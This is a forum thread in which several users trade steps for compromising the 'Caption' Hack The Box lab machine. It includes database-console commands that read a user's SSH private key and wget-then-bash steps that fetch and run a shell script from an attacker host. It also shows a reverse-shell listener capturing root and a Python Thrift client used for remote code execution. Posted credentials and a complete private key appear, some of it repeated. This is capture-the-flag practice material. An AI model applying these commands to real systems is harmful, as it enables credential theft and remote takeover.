[Mrok1234]

I've seen it, let me explain: Go here: http://caption.htb:8080/admin/dbviewer with the password root:root. Find the rsa with the query: CALL EXECVE('cat /home/margo/.ssh/id_ecdsa'); copy it and ask chatgpt to sort it hahaha, and then start with the ecdsa

[maggi]

could always upload a shell and get it that way.....

CALL REEXEC('wget  http://10.10.XX.XX:8000/shell.sh')
CALL REEXEC('chmod +x shell.sh')
CALL REEXEC('bash shell.sh');

Also logging into caption.htb portal is admin:cFgjE@0%l0

idk what good that will do?

[redbaby]

what next guys ?????????????

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Reposting hidden content for free

[Liy4]

for USER - i can get code execution but my reverse shells seems not to be working

Why do you need a shell when you can just cat the ssh private key?

└─$ ssh -i id_rsa margo@10.129.20.140
Load key "id_rsa": error in libcrypto

Ensure that your id_rsa key is in the correct OpenSSH format. After got the id_rsa from (CALL EXECVE('cat /home/margo/.ssh/id_ecdsa'); ) put it in to ChatGPT and ask format the key properly. then change the permitions to 'chmod 600'

[user142]

http://10.129.204.201:8080/ root:root
////
http://10.129.204.201:8080/admin/dbviewer
////
SELECT CAST(FILE_READ('/home/margo/.ssh/id_ecdsa') AS VARCHAR);
////
$ echo "KEY_FROM_DB" | xxd -r -p
////
sudo nano id_ecdsa
chmod 600 id_ecdsa
////
ssh -i id_ecdsa margo@10.129.204.201
margo@caption:~$ ls
app  copyparty-sfx.py  gitbucket.war  logs  user.txt
margo@caption:~$ cat user.txt

[Crazy_creeper]

Guys I just have something to clarify everyone has the id_ecdsa rt Can anyone confirm me if you have the first few words of the key like this (Before sorting it using GPT) : -----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS1zaG

[Unbutton8074]

for USER - i can get code execution but my reverse shells seems not to be working

Why do you need a shell when you can just cat the ssh private key?

└─$ ssh -i id_rsa margo@10.129.20.140
Load key "id_rsa": error in libcrypto

Ensure that your id_rsa key is in the correct OpenSSH format. After got the id_rsa from (CALL EXECVE('cat /home/margo/.ssh/id_ecdsa'); ) put it in to ChatGPT and ask format the key properly. then change the permitions to 'chmod 600'

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS1zaGEy
LW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQSQxiAAOBdjkpWEZCyNVU/9nVmyOryfxXgikgtDBGwX
d+PYkz97OlMJIADx0dds8gR7SjxV+B1VJtRQJm4/wuIeAAAAoD9jQjY/Y0I2AAAAE2VjZHNhLXNo
YTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJDGIAA4F2OSlYRkLI1VT/2dWbI6vJ/FeCKSC0ME
bBd349iTP3s6UwkgAPHR12zyBHtKPFX4HVUm1FAmbj/C4h4AAAAhANMx8DVOUW4eIgnGT/me3cyq
yYE+X1jwTBAhFrydzDweAAAAAAECAwQFBgc=
-----END OPENSSH PRIVATE KEY-----

[som3rAnd0m]

Can anyone help with the root?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[local]

└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.20.127] 51902
bash: cannot set terminal process group (1035): Inappropriate ioctl for device
bash: no job control in this shell
root@caption:~# ls
ls
go
go.mod
go.sum
output.log
root.txt
server.go
root@caption:~# cat root.txt
cat root.txt

---

for USER - i can get code execution but my reverse shells seems not to be working

Why do you need a shell when you can just cat the ssh private key?

└─$ ssh -i id_rsa margo@10.129.20.140
Load key "id_rsa": error in libcrypto

Ensure that your id_rsa key is in the correct OpenSSH format. After got the id_rsa from (CALL EXECVE('cat /home/margo/.ssh/id_ecdsa'); ) put it in to ChatGPT and ask format the key properly. then change the permitions to 'chmod 600'

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS1zaGEy
LW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQSQxiAAOBdjkpWEZCyNVU/9nVmyOryfxXgikgtDBGwX
d+PYkz97OlMJIADx0dds8gR7SjxV+B1VJtRQJm4/wuIeAAAAoD9jQjY/Y0I2AAAAE2VjZHNhLXNo
YTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJDGIAA4F2OSlYRkLI1VT/2dWbI6vJ/FeCKSC0ME
bBd349iTP3s6UwkgAPHR12zyBHtKPFX4HVUm1FAmbj/C4h4AAAAhANMx8DVOUW4eIgnGT/me3cyq
yYE+X1jwTBAhFrydzDweAAAAAAECAwQFBgc=
-----END OPENSSH PRIVATE KEY-----

SSH KEY ARE NOT THE SAME IF YOU'RE USING - RELEASE ARENA

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

[spamdegratis5]

The way to root is using thrift client and leverage the LogService rce
Steps:
- clone the repo in the margo home, generate the python files (easiest way) https://thrift.apache.org/tutorial/py.html

thrift --gen py log_service.thrift

- scp the generated file to your attacker machine, install the python library thrift (on your machine - virtual environment)
- create a file in the box using this format: {"user-agent":"your_payload'", "ip":"1.1.1.1"}
- local forward the 9090 port to your machine
- create a client in python and execute it

from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService

def main():
    transport = TSocket.TSocket('127.0.0.1', 9090)
    transport = TTransport.TBufferedTransport(transport)
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
    client = LogService.Client(protocol)
    transport.open()
    try:
        response = client.ReadLogFile("/path/to/file/created")
    except Exception as e:
        print(f"Error: {e}")
    finally:
        transport.close()

if __name__ == "__main__":
    main()

I couldn't understand the first step, could you explain better?

I couldn't understand the first step, could you explain better?

Clone the LogService repository from gitbucket into margo home, then enter the directory and run the above command, it should create a directory named gen-py that you need to download to your machine and continue from there.